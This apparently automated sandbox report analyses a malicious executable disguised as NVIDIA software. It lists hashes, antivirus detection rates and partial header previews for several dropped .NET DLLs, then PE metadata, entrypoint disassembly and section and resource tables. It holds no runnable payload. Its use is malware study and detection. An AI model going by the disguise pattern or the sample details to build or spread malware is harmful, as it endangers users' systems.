                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Windows\System32\w32tm.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.826029707357766
                                                          Encrypted:false
                                                          SSDEEP:3:VLV993J+miJWEoJ8FXAQvdtv3fvFAqvpay6vj:Vx993DEUphu8
                                                          MD5:CB697D36CCB76C1CC97B47402C034692
                                                          SHA1:0CC726401987825F2AE9655D5378335B01D75B99
                                                          SHA-256:39792408235B733426B40F5E9BFB206BC20FC10E08D15BA652C10644A7556512
                                                          SHA-512:E7DE1E31C34C9633593090518B373D35CF27ED20371B3C3AFF81FAB8E2FD8907CA5987460BB2B1F1C7359B89C7A7E1421DB51A7417230987DED4625EBC2947FE
                                                          Malicious:false
                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 13/01/2025 08:46:40..08:46:40, error: 0x80072746.08:46:45, error: 0x80072746.
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.448107762904028
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:NVIDIAShare.exe.bin.exe
                                                          File size:2'356'395 bytes
                                                          MD5:c9feda13f449c852ee9b95967bdfd3de
                                                          SHA1:015bf16040a779d85521d5296b6ed27d1e761e70
                                                          SHA256:ea0dec7cb08637c829b8c4d08439524e9c1ad5a7116e6cfd8780b533809bff72
                                                          SHA512:13664b8906c718673ce21194141c68f045a3ef925e9998fa44e1af9623b9a641e87afe0523d846b316c18f557e897ae980987e0fb27b856e0015d77e4242aac6
                                                          SSDEEP:49152:nBJV2ul0wFSe3LBPCLPN7KNt6joVQj8Axv02AcY7e0:Bmi07e7BPClKNt6joVQj3R+e0
                                                          TLSH:E9B59E119D93CDF3C6A63B3F8497082A41EDD7622613DBD77B0A19B1BA412639F121E3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                          Icon Hash:0cd3c0cad8c13244
                                                          Entrypoint:0x41f530
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                          Instruction
                                                          call 00007FA3D123921Bh
                                                          jmp 00007FA3D1238B2Dh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007FA3D122B977h
                                                          mov dword ptr [esi], 004356D0h
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 004356D8h
                                                          mov dword ptr [ecx], 004356D0h
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 004356B8h
                                                          push eax
                                                          call 00007FA3D123BFBFh
                                                          test byte ptr [ebp+08h], 00000001h
                                                          pop ecx
                                                          je 00007FA3D1238CBCh
                                                          push 0000000Ch
                                                          push esi
                                                          call 00007FA3D1238279h
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007FA3D122B8F2h
                                                          push 0043BEF0h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007FA3D123BA79h
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007FA3D1238C38h
                                                          push 0043C0F4h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007FA3D123BA5Ch
                                                          int3
                                                          jmp 00007FA3D123D4F7h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push 00422900h
                                                          push dword ptr fs:[00000000h]
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x25a04.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000x233c.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x640000x25a040x25c000aeee64ff4e5b648aa004ae79050732dFalse0.2716848613410596data5.055524641299278IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x8a0000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          PNG0x647340xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                          PNG0x6527c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                          RT_ICON0x668280x2a17PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9395823665893271
                                                          RT_ICON0x692400x4c28Device independent bitmap graphic, 128 x 256 x 8, image size 16384, 256 important colors0.09643003693065244
                                                          RT_ICON0x6de680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.18523454157782515
                                                          RT_ICON0x6ed100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.24458483754512636
                                                          RT_ICON0x6f5b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.23444700460829493
                                                          RT_ICON0x6fc800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.2203757225433526
                                                          RT_ICON0x701e80x27cbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9359968587415334
                                                          RT_ICON0x729b40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.06272920856500651
                                                          RT_ICON0x831dc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.11639004149377594
                                                          RT_ICON0x857840x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.14845215759849906
                                                          RT_ICON0x8682c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.19836065573770492
                                                          RT_ICON0x871b40x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.22783687943262412
                                                          RT_DIALOG0x8761c0x286dataEnglishUnited States0.5092879256965944
                                                          RT_DIALOG0x878a40x13adataEnglishUnited States0.60828025477707
                                                          RT_DIALOG0x879e00xecdataEnglishUnited States0.6991525423728814
                                                          RT_DIALOG0x87acc0x12edataEnglishUnited States0.5927152317880795
                                                          RT_DIALOG0x87bfc0x338dataEnglishUnited States0.45145631067961167
                                                          RT_DIALOG0x87f340x252dataEnglishUnited States0.5757575757575758
                                                          RT_STRING0x881880x1e2dataEnglishUnited States0.3900414937759336
                                                          RT_STRING0x8836c0x1ccdataEnglishUnited States0.4282608695652174
                                                          RT_STRING0x885380x1b8dataEnglishUnited States0.45681818181818185
                                                          RT_STRING0x886f00x146dataEnglishUnited States0.5153374233128835
                                                          RT_STRING0x888380x46cdataEnglishUnited States0.3454063604240283
                                                          RT_STRING0x88ca40x166dataEnglishUnited States0.49162011173184356
